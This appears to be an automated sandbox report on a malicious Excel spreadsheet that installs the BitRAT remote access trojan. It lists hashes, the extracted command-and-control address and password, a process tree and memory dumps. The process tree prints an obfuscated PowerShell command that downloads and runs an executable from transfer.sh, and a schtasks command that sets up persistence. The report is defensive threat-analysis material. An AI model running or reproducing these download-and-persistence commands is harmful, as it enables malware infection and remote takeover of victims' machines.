Analysis

  • max time kernel
    37s
  • max time network
    70s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-09-2023 08:48

General

  • Target

    Documento_Orslgroup_S.R.L_09_2023.xls

  • Size

    100KB

  • MD5

    c678822324d3db11afb66ad4dc9a5bb8

  • SHA1

    db82a3d3de0b0d90cc302e903e18dd9d2fb684c4

  • SHA256

    d77795d4563d03c0ec79533ac468580fa94ae26a54b5e14e34c3d6bdf9ae51b0

  • SHA512

    7a753d605ee1e5e14d3dbf0a67feb80c8fee21c0bdc7cba36298eead743b541e65d5d4d3f25124ec8d4ad54c38744f244bb721f7c0edb76d1a3441c0d291d03e

  • SSDEEP

    3072:BrxEtjPOtioVjDGUU1qfDlaGGx+cL2QnA9tJE2zuxq+fr9wBLa71ba2ryLTHeYD:pxEtjPOtioVjDGUU1qfDlavx+W2QnAnF

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Documento_Orslgroup_S.R.L_09_2023.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2192
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/SkazYLa2BT/happy.e^xe -o C:\Users\Public\pxpr0.exe;C:\Users\Public\pxpr0.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:5100
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/SkazYLa2BT/happy.exe -o C:\Users\Public\pxpr0.exe;C:\Users\Public\pxpr0.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1388
        • C:\Users\Public\pxpr0.exe
          "C:\Users\Public\pxpr0.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:736
          • C:\Users\Public\pxpr0.exe
            "C:\Users\Public\pxpr0.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:4816
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c copy "C:\Users\Public\pxpr0.exe" "C:\Users\Admin\AppData\Roaming\hope\hope.exe"
            5⤵
              PID:756
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\hope\hope.exe'" /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1776
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\hope\hope.exe'" /f
                6⤵
                • Creates scheduled task(s)
                PID:4692
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\hope"
              5⤵
                PID:5052
      • C:\Users\Admin\AppData\Roaming\hope\hope.exe
        C:\Users\Admin\AppData\Roaming\hope\hope.exe
        1⤵
        • Executes dropped EXE
        PID:1648

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o0s3oy53.4nr.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\hope\hope.exe
        Filesize

        7.6MB

        MD5

        9f42c993b0f9560fce2ac89d5b823b3b

        SHA1

        7c3ae9d0a92335ec5076490af4544a071d69c6d4

        SHA256

        3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

        SHA512

        867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

      • C:\Users\Admin\AppData\Roaming\hope\hope.exe
        Filesize

        512KB

        MD5

        eed90cac333ae28068ee87e8fed42902

        SHA1

        5941bb1faad20e6a5b9104f372a0f4653d57134a

        SHA256

        bfac1bee3f740ffd77fb3cf5047ede1b5bb82d2c0495721810dbcd420c6c6fa3

        SHA512

        9b534657fa3649899c4e7de9e5357b9de4d4d2304b54793918a7b2cafcae3595f936273f22d63daf41fcd906a3aede4e71757d2b9f62273647fc5ddbc4ad6540

      • C:\Users\Public\pxpr0.exe
        Filesize

        7.6MB

        MD5

        9f42c993b0f9560fce2ac89d5b823b3b

        SHA1

        7c3ae9d0a92335ec5076490af4544a071d69c6d4

        SHA256

        3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

        SHA512

        867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

      • C:\Users\Public\pxpr0.exe
        Filesize

        7.6MB

        MD5

        9f42c993b0f9560fce2ac89d5b823b3b

        SHA1

        7c3ae9d0a92335ec5076490af4544a071d69c6d4

        SHA256

        3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

        SHA512

        867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

      • C:\Users\Public\pxpr0.exe
        Filesize

        7.6MB

        MD5

        9f42c993b0f9560fce2ac89d5b823b3b

        SHA1

        7c3ae9d0a92335ec5076490af4544a071d69c6d4

        SHA256

        3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

        SHA512

        867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

      • memory/736-69-0x0000000074840000-0x0000000074FF0000-memory.dmp
        Filesize

        7.7MB

      • memory/736-62-0x00000000071C0000-0x000000000794A000-memory.dmp
        Filesize

        7.5MB

      • memory/736-61-0x0000000005650000-0x0000000005660000-memory.dmp
        Filesize

        64KB

      • memory/736-60-0x0000000005C10000-0x00000000061B4000-memory.dmp
        Filesize

        5.6MB

      • memory/736-59-0x00000000004D0000-0x0000000000C64000-memory.dmp
        Filesize

        7.6MB

      • memory/736-58-0x0000000074840000-0x0000000074FF0000-memory.dmp
        Filesize

        7.7MB

      • memory/1388-47-0x0000022CC0840000-0x0000022CC0850000-memory.dmp
        Filesize

        64KB

      • memory/1388-36-0x00007FFBD7B20000-0x00007FFBD85E1000-memory.dmp
        Filesize

        10.8MB

      • memory/1388-57-0x00007FFBD7B20000-0x00007FFBD85E1000-memory.dmp
        Filesize

        10.8MB

      • memory/1388-48-0x0000022CC0840000-0x0000022CC0850000-memory.dmp
        Filesize

        64KB

      • memory/1388-44-0x00007FFBD7B20000-0x00007FFBD85E1000-memory.dmp
        Filesize

        10.8MB

      • memory/1388-39-0x0000022CC0840000-0x0000022CC0850000-memory.dmp
        Filesize

        64KB

      • memory/1388-28-0x0000022CD8DB0000-0x0000022CD8DD2000-memory.dmp
        Filesize

        136KB

      • memory/1388-37-0x0000022CC0840000-0x0000022CC0850000-memory.dmp
        Filesize

        64KB

      • memory/2192-8-0x00007FFBC2FF0000-0x00007FFBC3000000-memory.dmp
        Filesize

        64KB

      • memory/2192-11-0x00007FFC02F70000-0x00007FFC03165000-memory.dmp
        Filesize

        2.0MB

      • memory/2192-24-0x000002B230080000-0x000002B230880000-memory.dmp
        Filesize

        8.0MB

      • memory/2192-38-0x00007FFC02F70000-0x00007FFC03165000-memory.dmp
        Filesize

        2.0MB

      • memory/2192-40-0x00007FFC02F70000-0x00007FFC03165000-memory.dmp
        Filesize

        2.0MB

      • memory/2192-41-0x000002B230080000-0x000002B230880000-memory.dmp
        Filesize

        8.0MB

      • memory/2192-42-0x000002B230080000-0x000002B230880000-memory.dmp
        Filesize

        8.0MB

      • memory/2192-43-0x000002B230080000-0x000002B230880000-memory.dmp
        Filesize

        8.0MB

      • memory/2192-23-0x000002B230080000-0x000002B230880000-memory.dmp
        Filesize

        8.0MB

      • memory/2192-0-0x00007FFBC2FF0000-0x00007FFBC3000000-memory.dmp
        Filesize

        64KB

      • memory/2192-20-0x000002B230080000-0x000002B230880000-memory.dmp
        Filesize

        8.0MB

      • memory/2192-5-0x00007FFBC2FF0000-0x00007FFBC3000000-memory.dmp
        Filesize

        64KB

      • memory/2192-10-0x00007FFC02F70000-0x00007FFC03165000-memory.dmp
        Filesize

        2.0MB

      • memory/2192-14-0x00007FFBC08E0000-0x00007FFBC08F0000-memory.dmp
        Filesize

        64KB

      • memory/2192-2-0x00007FFC02F70000-0x00007FFC03165000-memory.dmp
        Filesize

        2.0MB

      • memory/2192-9-0x00007FFC02F70000-0x00007FFC03165000-memory.dmp
        Filesize

        2.0MB

      • memory/2192-3-0x00007FFBC2FF0000-0x00007FFBC3000000-memory.dmp
        Filesize

        64KB

      • memory/2192-13-0x00007FFBC08E0000-0x00007FFBC08F0000-memory.dmp
        Filesize

        64KB

      • memory/2192-7-0x00007FFBC2FF0000-0x00007FFBC3000000-memory.dmp
        Filesize

        64KB

      • memory/2192-1-0x00007FFC02F70000-0x00007FFC03165000-memory.dmp
        Filesize

        2.0MB

      • memory/2192-6-0x00007FFC02F70000-0x00007FFC03165000-memory.dmp
        Filesize

        2.0MB

      • memory/2192-12-0x00007FFC02F70000-0x00007FFC03165000-memory.dmp
        Filesize

        2.0MB

      • memory/2192-4-0x00007FFC02F70000-0x00007FFC03165000-memory.dmp
        Filesize

        2.0MB

      • memory/4816-65-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-68-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-66-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-72-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-73-0x0000000074750000-0x0000000074789000-memory.dmp
        Filesize

        228KB

      • memory/4816-74-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-75-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-76-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-77-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-78-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-79-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-80-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-81-0x0000000074AD0000-0x0000000074B09000-memory.dmp
        Filesize

        228KB

      • memory/4816-82-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-83-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-84-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-85-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/4816-63-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB